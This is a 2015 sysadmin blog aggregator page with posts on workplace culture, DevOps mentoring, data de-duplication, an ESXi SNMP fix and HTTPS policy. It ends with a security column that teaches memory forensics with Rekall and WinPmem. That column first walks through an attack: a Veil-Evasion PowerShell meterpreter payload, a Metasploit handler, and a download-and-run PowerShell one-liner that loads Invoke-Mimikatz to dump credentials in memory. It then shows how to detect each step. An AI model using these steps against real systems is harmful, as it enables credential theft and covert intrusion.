by Richard Bejtlich ( at May 10, 2015 10:15 PM

May 08, 2015


In search of a better class of asshole

The No Asshole Rule is a very well-known criterion for building a healthy workplace. If you've worked in a newer company (say, incorporated within the last 8 years) you probably saw this or something much like it in the company guidelines or orientation. What you may not have seen were the principles.

Someone is an asshole if the answer to these questions is yes:

    1. After encountering the person, do people feel oppressed, humiliated or otherwise worse about themselves?
    2. Does the person target people who are less powerful than them?

If so, they are an asshole and should be gotten rid of.

And if we all did this, the tech industry would be a much happier place. It's a nice principle.

The problem is that the definition of 'asshole' is an entirely local one, determined by the office culture. This has several failure-modes.

Anyone who doesn't agree with the team-leader/boss is an asshole.

Quite a perversion of the intent of the rule, as this definitely harms those less powerful than the oppressor, but this indeed happens. Dealing with it requires a higher order of power to come down on the person. Which doesn't happen if the person is the owner/CEO. Employees take this into their own hands by working somewhere else for someone who probably isn't an asshole.

All dissent to power must be politely phrased and meekly accepting of rejection.

In my professional opinion, sir, I believe the cost-model presented here is overly optimistic in several ways.

I have every confidence in it.

Yes sir.

The thinking here is that reasoned people talk to each other in reasoned ways, and raised voices or interruptions are a key sign of an unreasonable person. Your opinion was tried, and adjudged lacking; lose gracefully.

In my professional opinion, sir, I believe the cost-model presented here is overly optimistic in several ways.

I have every confidence in it.

The premise you've built this on doesn't take into account the ongoing costs for N. Which throws off the whole model.

Mr. Anderson, I don't appreciate your tone.

It's a form of tone policing.

All dissent between team-mates must be polite, reasoned, and accountable to everyone's feelings.

Sounds great. Until you get a tone cop in the mix who uses the asshole-rule as a club to oppress anyone who disagrees with them.

I'm pretty sure this new routing method introduces at least 10% more latency to that API path. If not more.

I worked on that for a week. I'm feeling very intimidated right now.

😝. Sorry, I'm just saying that there are some edge cases we need to explore before we merge it.


Okay, let's merge it into Integration and run the performance suite on it.

This is a classic bit of office-politics judo. Because no one wants to be seen as an asshole, if you can make other people feel like one they're more likely to cave on contentious topics.

Which sucks big-time for people who actually have problems with something. Are they a political creature, or are they owning their pain?

The No Asshole Rule is a great principle in the abstract, but it took the original author 224 pages to communicate the whole thing in the way he intended it. That's 223.5 pages longer than most people have the attention span for, especially in workplace orientations, so most readers are never going to be clued into the nuances. It is inevitable that a 'no asshole rule' enshrined in a corporate code-of-conduct is going to be defined organically through the culture of the workplace and not by any statement of principles.

That statement of principles may exist, but the operational definition will be defined by the daily actions of everyone in that workplace. It is going to take people at the top using the disciplinary hammer to course-correct people into following the listed principles, or it isn't going to work. And that hammer itself may include any and all of the biases I lined out above.

Like any code of conduct, the "or else" needs to be defined, and follow-through demonstrated, in order for people to give it appropriate attention. Vague statements of principles like "no assholes allowed" or "be excellent to each other" are not enforceable codes, as there is no way to objectively define them without acres of legalese.

by SysAdmin1138 at May 08, 2015 07:31 PM

May 07, 2015

Michael Biven

Leadership, Mentoring and Team Chemistry, the Soft Skills needed for DevOps

When I wrote that as a profession we’ve only scratched the surface of applying the ideas from DevOps and that we’ve been focused on the tools side of things I had thoughts in mind on how to address the points I raised.

One is the importance of mentoring and leadership as part of creating successful teams. During my career as a fire fighter I was lucky enough to learn these points by example from some amazing people. These ideas were not just part of our culture, they were expected and they’re what I want to share with you.

Any team requires both members and leaders. Nothing earth-shattering there. But when you have a culture of mentoring and solid leadership, that mix of people can grow into a successful team that lasts as long as you can keep them.

Our field is an ever-changing and chaotic environment, and that's what draws some of us to it. It requires attention to what is going on, and it gives each of us opportunities to learn something new or revisit old ideas again.

OK quick side note… while writing this autocorrect changed revisit to resist. Not sure if my text editor was trying to tell me something.

What we cannot have is that same pace of change and chaos reflected in the teams themselves. The leaders in each team who step up to take on different roles need to provide stability. They include the official (tech leads, managers, and directors) and the unofficial (experienced engineers who've earned the respect of their peers).

As a leader you become responsible for your team. Their needs, problems, and failures become yours, but just remember that their successes are their own. It means that you will need to be a good listener while also providing honest and direct feedback. You will need to provide a calm and positive outlook on the work at hand no matter what difficult challenges you are facing. Your job becomes not keeping the system, site or service up, it becomes keeping your team up.

The other important role a leader performs is clearly communicating to everyone the current situation, the challenges ahead and the goals for not only the team, but for the entire organization. If you have a team of capable people and have this type of clear and transparent communication going in both directions they should be able to prevail against almost any problem they face.

One of the best descriptions I’ve seen of what this looks like was from Gene Kranz.

“There, we learn the difference between the ‘I’ and the ‘we’ component of the team, because when the time comes, we need our people to step forward, take the lead, make their contribution, and then when they’re through, return to the role as a member of the team.” Kranz then went on to explain the “chemistry” aspect of a team: “it amplifies the individual’s talents as well as the team’s talent. Chemistry leads to communication that is virtually intuitive, because we must know when the person next to us needs help, a few more seconds to come up with an answer.”

— Apollo 13 Flight Director Gene Kranz speaking at the National Air and Space Museum on April 8 2005

The fact that this type of chemistry has to be cultivated over time is really a completely separate subject. But the short of it is you can't have a team that performs at that level without having them do the work, responding to outages, and training together. That last bit is something that's sorely missed in many operations teams.

One way to help encourage this type of dynamic and to continue to pass down the institutional memory from one generation to the next is by making mentoring a key part of your teams.

This includes not only mentoring new members who join, but also existing people who have stepped up into more senior or different roles. No longer being the new person doesn't mean you should stop being mentored.

There is already a bit of inertia that you will be fighting against that actually discourages all of this. As a profession we tend to stay in our respective technology silos without stepping outside to see how other tools and languages have approached similar problems. We end up disregarding the results of other smart people who already addressed what we're working on.

Then we have ageism continuing to bleed out knowledge from some of our peers who just happen to have years of experience. Think of the idea that everything comes back again or ideas are cyclical.

You could reason that old ideas come back around because the technology we have has either been improved or created to the point that they are now practical. I've learned to think of this not as a circle, but as if we're looking at it down along its axis. It's more of a spiral moving linearly into the future. We just tend to not always see the progress, and we ignore the past when we only see it as a circle.

Each of these ideas is not only applicable to our individual organizations, but to our field as a whole. Events like DevOpsDays are amazing opportunities for us to share our experiences and help mentor someone along for the little bit of time we have with them. Just remember not to pass up the chance to get some mentoring of your own while you're there.

If you find yourself starting out taking a DevOps approach to how your development team works, you will need people to lead and champion those changes and mentors to share the ideas with everyone. If you don't, then it will become just another attempt to use a different methodology (think Agile or Lean) to improve the output of the team. And I think many reading this have had unsuccessful experiences when those types of changes come down from management as a "we're doing this now. Here is a class or book. Now make it work."

It doesn’t matter what the change is: if the team has the leadership, mentors, and chemistry, they can make things happen, or they have the weight to challenge ideas that will not work.

One final comment that I want to point out is these ideas don’t exclude self-managed organizations. The fire service is very structured. Pretty much you can think of it as paramilitary, but it’s made up of several self-managed teams who each have a fair amount of flexibility. You could say they are the pinnacle of the Results Only Work Environment and self-managed teams. And they succeed by taking care of their people with these ideas, after that everything else usually just falls into place.

May 07, 2015 07:45 AM

Steve Kemp's Blog

On de-duplicating uploaded file-content.

This evening I've been mostly playing with removing duplicate content. I've had this idea for the past few days about object-storage, and obviously in that context if you can handle duplicate content cleanly that's a big win.

The naive implementation of object-storage involves splitting uploaded files into chunks, storing them separately, and writing database-entries such that you can reassemble the appropriate chunks when the object is retrieved.

If you store chunks on-disk, by the hash of their contents, then things are nice and simple.

The end result is that you might upload the file /etc/passwd, split that into four-byte chunks, and then hash each chunk using SHA256.

This leaves you with some database-entries, and a bunch of files on-disk:
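The on-disk layout can be mimicked with standard tools; this sketch (the demo file and the 4-byte chunk size are chosen purely for illustration) shows why hash-named chunks deduplicate:

```shell
# Mimic the toy store: split a file into 4-byte chunks, then hash each
# chunk. Chunks with identical content get identical SHA256 names, so
# storing them under their hash deduplicates automatically.
cd "$(mktemp -d)"
printf 'aaaabbbbaaaacccc' > demo
split -b 4 demo chunk.
sha256sum chunk.*   # four chunks on disk, only three distinct hashes
```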


In my toy-code I wrote out the data in 4-byte chunks, which is grossly inefficient. But the value of using such small pieces is that there is liable to be a lot of collisions, and that means we save space. It is a trade-off.

So the main thing I was experimenting with was the size of the chunks. If you make them too small you lose I/O performance due to the overhead of writing out so many small files, but you gain because collisions are common.

The rough testing I did involved using chunks of 16, 32, 128, 255, 512, 1024, 2048, and 4096 bytes. As sizes went up the overhead shrank, but also so did the collisions.

Unless you can handle the case of users uploading a lot of files like /bin/ls, which are going to collide 100% of the time with prior uploads, using larger chunks just didn't win as much as I thought they would.

I wrote a toy server using Sinatra & Ruby, which handles the splitting and hashing, and stores block-IDs in SQLite. It's not so novel given that it took only an hour or so to write.

The downside of my approach is also immediately apparent: all the data must live on a single machine, so that reassembly works in the simple fashion. That's possible, even with lots of content, if you use GlusterFS or similar, but it's probably not a great approach in general. If you have large-capacity storage available locally then this might work well enough for storing backups, etc, but .. yeah.

May 07, 2015 12:00 AM

May 06, 2015

Standalone Sysadmin

New Blog Theme is Up

The other day, I got an email from a loyal reader who let me know that, when you find Standalone SysAdmin on Google, you get a little warning that says, “This site may be hacked”. Well, that’s not good. It was clearly related to some adware that got installed a while back by accident (where “accident” means that WordPress allowed someone to upload a .htaccess file into my blog’s uploads directory, and then used that as a springboard for advertising Casino sites). Somehow, the vulnerability was severe enough that the wp-footer.php file was able to be modified as well. Ugh.

After cleaning up the uploads directory and removing the extraneous plugins that I wasn’t using, or didn’t like, or whatever, I went to clean up the footer, but I thought, “I wonder why my security scans didn’t pick this up?”. The blog runs Wordfence thanks to recommendations from several other bloggers, and it’s really good software. It was able to help me with cleaning up most of the modified files because it can compare the originals with what’s installed, and revert to the reference copy. But it didn’t do that with my theme.

As it turns out, the theme I was running was an antique one named Cleaker. I really liked how it looked at the time I installed it, which was back in 2009 when I migrated from Blogger. Well, you can’t even download Cleaker anymore, at least from the author. So why not use this as a chance to put something new in place?

Funny, that “Welcome to the Future” post mentions RSS, but practically no one reads blogs through RSS anymore. Oh, there are still some, but when Google killed Reader, RSS readers dropped almost off the radar, so you’re almost certainly reading this on the actual site, and that means you’re almost certainly seeing the new site theme. It’s a fairly standard one called Twenty Fourteen, which I’m sure will feel hilariously old when I get around to changing it in 2020. The banner image at the top rotates occasionally between several images that I’ve taken or that come from some Free-Without-Attribution source. There are seriously tons of free image sources out there, if you’re looking.

Anyway, I just wanted to let you know that the look of the site has changed, so when I inevitably get around to writing more content, this is what you’ll be seeing. Unless, of course, everyone comments below to let me know that it sucks; if you think so, please do tell me. If you like it, don’t like it, or are so ambivalent about it that you want to comment and let me know that too, then go for it. Thanks!

by Matt Simmons at May 06, 2015 11:04 AM

May 05, 2015

Ben's Practical Admin Blog

Fixing Errors When Trying to Configure SNMP on ESXi

One of the tasks I am working on is the configuration of our fleet of Dell servers to use Dell’s OpenManage Essentials monitoring and management platform. One of the servers, however, had been unwilling to have its SNMP configuration changed using the vSphere CLI tools and was generating the following error:

Changing notification(trap) targets list to: myserver.local@162/DELLOME…
Use of uninitialized value $sub in string eq at C:/Program Files (x86)/VMware/VMware vSphere CLI/Perl/lib/VMware/ line 81.
Use of uninitialized value $package in concatenation (.) or string at C:/Program Files (x86)/VMware/VMware vSphere CLI/Perl/lib/VMware/ line 50.
Undefined subroutine &Can’t call method “ReconfigureSnmpAgent” on an undefined value at C:\Program Files (x86)\VMware\VMware vSphere CLI\bin\vicfg-snm line 297.
::fault_string called at C:\Program Files (x86)\VMware\VMware vSphere CLI\bin\ line 299.

Hrm, OK, fine. Let’s try logging in to the host’s ESXi Shell and using esxcli to set the trap:

Community string was not specified in trap target: myserver.local

Clearly something is broken with the SNMP configuration. Luckily the VMware forums were quick to supply a solution.

The SNMP settings for ESXi are stored in the XML file /etc/vmware/snmp.xml. You can either clear this file (cat /dev/null > /etc/vmware/snmp.xml) or, if you know what the setting should be, modify it. In my case I needed to update the <targets></targets> XML tag to have a community string:

<targets>myserver.local@162 DELLOME</targets>
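If you would rather script the edit than hand-modify the file, the tag update is easy to do programmatically. A sketch in Python; note the wrapper elements around <targets> here are invented for illustration, and the real snmp.xml layout may differ:

```python
# Sketch: update the <targets> element of an ESXi-style snmp.xml so the
# trap target carries a community string. The surrounding XML structure
# is a placeholder; only the <targets> edit is the point.
import xml.etree.ElementTree as ET

snmp_xml = "<config><snmpSettings><targets>myserver.local@162</targets></snmpSettings></config>"
root = ET.fromstring(snmp_xml)
targets = root.find(".//targets")
targets.text = "myserver.local@162 DELLOME"   # hostname@port community
print(ET.tostring(root, encoding="unicode"))
```

On a real host you would read and write /etc/vmware/snmp.xml instead of an inline string, then restart the SNMP agent.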

by Ben at May 05, 2015 11:11 PM

May 04, 2015

Everything Sysadmin

Note to Boeing 787 Dreamliner owners: Reboot every 248 days

If you own a Boeing 787 Dreamliner, and I'm sure many of our readers do, you should reboot it every 248 days. In fact, reboot more frequently than that, because at about the 248-day mark the power system will fail due to a software bug.

Considering that 248 days is about 2^31 hundredths of a second, it is pretty reasonable to assume there is a timer with 10-millisecond (1/100 second) resolution held in a signed 32-bit int. It would overflow every 248 days.
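The overflow arithmetic is easy to check. A quick sketch, assuming a counter of 1/100-second ticks held in a signed 32-bit int:

```python
# A signed 32-bit counter of 10 ms (1/100 s) ticks overflows at 2**31 ticks.
TICK_SECONDS = 1 / 100
overflow_days = (2**31 * TICK_SECONDS) / 86400  # seconds per day
print(round(overflow_days, 1))  # about 248.6 days
```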

"Hell yeah, I did it! I saved 4 bytes every time we store a timestamp. Screw you. It's awesome."
(a software engineer who makes planes but doesn't have to operate them)

Reminds me of all the commercial software I've seen that was written by developers who didn't seem to care about, or were ignorant of, the operational realities that their customers live with.

Last week at DevOpsDays NYC 2015 I was reminded time and time again that the most important part of DevOps is shared responsibility: The opposite of workers organized in silos of responsibilities, ignorant and unempathetic to the other silos.

May 04, 2015 03:00 PM

The awesomely epic guide to KDE

This article gives an overview of the major KDE features like font management, visual effects, file management, eye candy, the panels, the task switcher and more great KDE stuff.

May 04, 2015 12:00 AM

Steve Kemp's Blog

A weekend of migrations

This weekend has been all about migrations:

Host Migrations

I've migrated several more systems to the Jessie release of Debian GNU/Linux. No major surprises, and now I'm in a good state.

I have 18 hosts, and now 16 of them are running Jessie. One of them I won't touch for a while, and the other is a KVM host which runs about 8 guests, so I won't upgrade that for a while (because I want to schedule the shutdown of the guests for the host reboot).

Password Migrations

I've started migrating my passwords to pass, which is a simple shell wrapper around GPG. I generated a new password-managing key and began moving the passwords over.

I dislike that account-names are stored in plaintext, but that seems known and unlikely to be fixed.
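A toy illustration of why the names leak; this is not real pass or GPG, just a stand-in directory with stub files, but the layout is the same idea: each entry is a file named after the account, so only the file contents are ever encrypted.

```python
# Toy pass-style store: the account name IS the filename, so anyone who can
# list the directory learns which accounts exist, even though the payloads
# would be GPG-encrypted in the real tool.
import os
import tempfile

store = tempfile.mkdtemp(prefix="passdemo-")
for account in ("banking", "amazon", "facebook"):
    with open(os.path.join(store, account + ".gpg"), "w") as f:
        f.write("<encrypted payload would go here>")

# No decryption needed to learn the account names:
visible = sorted(name[:-4] for name in os.listdir(store) if name.endswith(".gpg"))
print(visible)  # ['amazon', 'banking', 'facebook']
```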

I've "solved" the problem by dividing all my accounts into "Those that I wish to disclose post-death" (i.e. "banking", "amazon", "facebook", etc, etc), and those that are "never to be shared". The former are migrating, the latter are not.

(Yeah I'm thinking about estates at the moment, near-death things have that effect!)

May 04, 2015 12:00 AM

May 03, 2015

Everything Sysadmin

Raspberry Pi Arcade Machine

This article shows you how to build your own full-size arcade machine using a Raspberry Pi. It involves a real, full-size arcade cabinet, a converter device called a J-Pac, and the MAME emulator software.

May 03, 2015 12:00 AM

Filing Effective Bug Reports

This article shows you how to report bugs properly and help open source projects by doing so. It explains the things that help create a good bug report, one the developers can actually work on. It also explains the process of bug reporting: what happens after you've made the initial report?

May 03, 2015 12:00 AM

May 02, 2015

Warren Guy

Planet SysAdmin: Call for blogs

I'm devoting a little time this weekend to the upkeep of Planet SysAdmin, so I'm putting out a call for new content.

Do you write a system administration, tech, security or otherwise relevant blog? Know of one that other SysAdmins might enjoy or find useful? Then please let me know about it! Comment below or send me an email.

Read full post

May 02, 2015 02:51 AM

May 01, 2015

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – April 2015

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this month:
  1. “Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009. Is it relevant now? Well, you be the judge. Current emergence of open source log search tools, BTW, does not break the logic of that post. SIEM requires a lot of work, whether you paid for the software or not. [282 pageviews]
  2. “Simple Log Review Checklist Released!” is often at the top of this list – the checklist is still a very useful tool for many people. “On Free Log Management Tools” is a companion to the checklist (updated version) [116 pageviews]
  3. “Top 10 Criteria for a SIEM?” came from one of the last projects I did when running my SIEM consulting firm in 2009-2011 (for my recent work on evaluating SIEM, see this document) [114 pageviews]
  4. My classic PCI DSS Log Review series is always popular! The series of 18 posts covers a comprehensive log review approach (OK for PCI DSS 3.0 as well), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (just out in its 4th edition!) [100+ pageviews to the main tag]
  5. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using a now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. [92 pageviews of total 5079 pageviews to all blog pages]
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog:

Current research on security analytics:
Miscellaneous fun posts:
(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014.
Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on Aug 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.
Previous post in this endless series:

by Anton Chuvakin at May 01, 2015 06:11 PM

Adnans Sysadmin/Dev Blog

Why I don't like that Mozilla is "Deprecating non-secure HTTP"

Mozilla wants to deprecate non-secure HTTP, will make proposals to W3C ‘soon’

I'm a blogger and sysadmin. I like running servers, and I like to write. Being able to buy a domain and a server was all I needed to do in order to run a blog. Sometimes I used dynamic DNS if I wanted to run the blog on my own server at home. Now I need to buy a security cert, which is more money. And we already know the kinds of companies that publish certs; it's hard to trust them after the reputation they have earned. Plus there is the added hassle of configuring the server with the cert you just bought.

If I use a self-signed cert, like most student bloggers are probably going to do, there is going to be an ugly warning shown to anyone who just happens to run across the blog. The warning is bad enough to scare away any potential readers.

As it is, blogging on your own server is not popular. The above is a simple way of killing it. Who is going to go through this hassle? Instead of making things easier, we've just made it harder.

I don't like it.

What's the point of requiring security on the public-facing pages of a blog? It makes no sense. I want people to read what I write, and there is no requirement for security there. The admin interface for a blog is a different story: there you want security, since you have to enter credentials and protect the admin interface from spammers. Which means it makes sense to secure some parts of a website and not others.

There was a recent post on Hacker News (I can't find the link) from an admin asking Mozilla to reconsider, since this would break the way a lot of academics work.

And all this just because companies out there are too lazy to secure their websites, putting their customers in danger. Why are indie web developers being punished for the laziness of large companies?

Here is another well reasoned article on this topic.

Found this quote which seemed apt:
One must stress that it was not merely technological wizardry that set people dreaming: it was also the openness of the industry then rising up. The barriers to entry were low. Radio in the 1920s was a two-way medium accessible to most any hobbyist, and for a larger sum any club or other institution could launch a small broadcast station. Compare the present moment: radio is hardly our most vital medium, yet it is hard if not impossible to get a radio license, and to broadcast without one is a federal felony. In 1920, De Forest advised, “Obtaining the license is a very simple matter and costs nothing.”
- Tim Wu, The Master Switch

by Adnan Wasim at May 01, 2015 04:56 PM

toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem

Prerequisites: any Python-enabled system if running from source; for Windows, a standalone exe with all dependencies met is available.


This month represents our annual infosec tools edition, and I’ve got a full scenario queued up for you. We’re running with a vignette based in absolute reality. When your organizations are attacked (you already have been) and a compromise occurs (assume it will) it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011 we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we’ll explore Rekall. The project’s point man, Michael Cohen branched Volatility, aka the scudette branch, in December 2011, as a Technology Preview. In December 2013, it was completely forked and became Rekall to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release to 1.3.2 was posted to Github 26 APR 2015.
Michael provided personal insight into his process and philosophy, which I’ll share verbatim in part here:
For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!
While we won’t cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario Overview

We start with the assertion that the red team’s attack graph is the blue team’s kill chain.
Per Captain Obvious: the better defenders (blue team) understand attacker methods (red team), the more able they are to defend against them. Conversely, the more aware red teamers are of blue team detection and analysis tactics, the more readily they can evade them.
As we peel back this scenario, we’ll explore both sides of the fight; I’ll walk you through the entire process including attack and detection. I’ll evade and exfiltrate, then detect and define.
As you might imagine, the attack starts with a targeted phishing attack. We won't linger here; you've all seen the like. The key takeaway for red and blue: the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful, everyone wants to “win” something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team's best friend and the blue team's bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we'll assume we've compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim's network can be your playground. I'll show you how.


Keep in mind, I’m going into some detail here regarding attack methods so we can then play them back from the defender’s perspective with Rekall, WinPmem, and VolDiff.

All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer's (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payloads that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams, as no initial alerts are generated. While the payload does land on the victim's file system, it's not likely to end up quarantined or deleted, happily delivering its expected functionality.
I installed Veil-Evasion on my Kali VM easily:
1)      apt-get install veil
2)      cd /usr/share/veil-evasion/setup
3)      ./
Thereafter, to run Veil you need only execute veil-evasion.
Veil includes 35 payloads at present; choose list to review them.
I chose 17) powershell/meterpreter/rev_https as seen in Figure 1.

Figure 1 – Veil payload options
I ran set LHOST for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you’d see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain.

This step assumes our victim has executed our payload in a time period of our choosing. Obviously, set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity's sake, but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security's How-To: Post-Ex Persistence Scripting with PowerSploit & Veil as a great primer on these methods.
Again, on my Kali system I set up a handler for the shell access created by the Veil payload.
1)      cd /opt/metasploit/app/
2)      msfconsole
3)      use exploit/multi/handler
4)      set payload windows/meterpreter/reverse_https
5)      set lhost
6)      set lport 8443
7)      set exitonsession false
8)      run exploit –j
At this point back returns you to the root msf > prompt.
When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2.

Figure 2 – Victim Meterpreter session
Use sessions -l to list sessions available; use sessions -i 2 to use the session seen in Figure 2.
I now have an interactive shell with the victim system and have some options. As I'm trying to exemplify running almost entirely in victim memory, I opted not to copy additional scripts to the victim; if I did so, it would be another PowerShell script to make use of Joe Bialek's (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy's (@gentilkiwi) Mimikatz. Instead I pulled down Joe's script directly from Github and ran it directly in memory, leaving no file system artifacts.
From the MSF console, I first ran spool /root/meterpreter_output.txt.
Then via the Meterpreter session, I executed the following.
1) getsystem (if the user is running as admin you’ll see “got system”)
2) shell
3) powershell.exe "iex (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"
A brief explanation here. The shell command spawns a command prompt on the victim system; getsystem ensures that you're running as local system (NT AUTHORITY\SYSTEM), which is important when you're using Joe's script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again, our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To avoid writing output to the victim file system, I used the spool command to write all content back to a text file on my Kali system. I used PowerShell's ability to read in Joe's script directly from Github into memory and poach credentials accordingly. Back on my Kali system a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results.

Figure 3 – Invoke-Mimikatz for the win!
If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I’d certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-)
Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they “can remember it for you wholesale!”


Rekall preparation

Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written.
On x64 systems it will install to C:\Program Files\Rekall, you can add this to your PATH so you can run Rekall from anywhere.


WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and it’s developed against with a passion.
Running WinPmem for live response is as simple as winpmem.exe -l to load the driver; you then launch Rekall to mount the winpmem device with rekal -f \\.\pmem (this cannot be changed) for live memory analysis.

Rekall use

There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal, which will drop you into the interactive shell. As an example I ran rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw, then from the shell ran various plugins. Alternatively, I could have run rekal -f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the “most powerful and flexible interface”, most importantly because it allows session management and storage specific to an image analysis.
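For repeated triage, those non-interactive invocations are easy to script. A hedged sketch that only builds the command lines used in this post (the image path is the example from above; on a system with Rekall installed you would hand each list to subprocess.run):

```python
# Build rekal command lines for a batch of plugins against one memory image.
# Purely a convenience wrapper around the non-interactive commands shown in
# the post; nothing here is Rekall's own API.
IMAGE = r"D:\forensics\memoryImages\toolsmith\compromised.raw"  # example path

def rekal_cmd(image, plugin, *args):
    return ["rekal", "-f", image, plugin, *args]

cmds = [rekal_cmd(IMAGE, p) for p in ("netstat", "pstree")]
for cmd in cmds:
    print(" ".join(cmd))
    # subprocess.run(cmd) would execute it where Rekall is installed
```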

Suspicious Indicator #1
From the interactive shell I started with the netstat plugin, as I always do. Might as well see who is talking to whom, yes? We're treated to the instant results seen in Figure 4.

Figure 4 – Rekall netstat plugin shows PowerShell with connections
Yep, sure enough we see a connection to our above-mentioned attacker; the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396.

Suspicious Indicator #2
With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing.

Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs
Suspicious Indicator #3
I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-up: “Trojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number).

Suspicious Indicator #4
To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables, and writes them out into an external file, then creates an index file useful for finding the related virtual addresses. I did so with memdump pid=2396, dump_dir="/tmp/", ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is a strings keyword search. Given that we are responding to what we can reasonably assert is an attack via PowerShell, a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invoke against powershell.exe_2396.dmp. The results paid immediate dividends; I've combined two critical matches in Figure 6.
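The keyword search itself needs nothing exotic. A minimal Python stand-in for a context-driven strings search over a memory dump; the dump bytes below are fabricated for illustration:

```python
# Scan a process memory dump for an ASCII keyword and return each match with
# a little surrounding context, a bare-bones stand-in for a context-driven
# strings tool.
def keyword_hits(data, keyword, context=20):
    hits, start = [], 0
    while (idx := data.find(keyword, start)) != -1:
        lo, hi = max(0, idx - context), idx + len(keyword) + context
        hits.append(data[lo:hi])
        start = idx + 1
    return hits

# Fabricated stand-in for powershell.exe_2396.dmp contents:
dump = b"\x00junk\x00powershell.exe -Invoke-Mimikatz -DumpCreds\x00more"
hits = keyword_hits(dump, b"Invoke")
for hit in hits:
    print(hit)
```

In practice you would read the real .dmp file in binary mode and search case-insensitively, but the principle is the same.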

Figure 6 – Strings results for keyword search from memdump output
Suspicions confirmed, this box be owned, aargh!
The strings results on the left show the initial execution of the PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy, followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the right show when Invoke-Mimikatz.ps1 was actually executed.
